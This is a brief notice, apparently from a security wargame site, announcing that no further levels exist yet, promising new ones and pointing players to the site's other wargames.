At this moment, there are no more levels to play in this game. However, we are constantly working
on new levels and will most likely expand this game with more levels soon.
Keep an eye out for an announcement on our usual communication channels!
In the meantime, you could play some of our other wargames.

If you have an idea for an awesome new level, please let us know!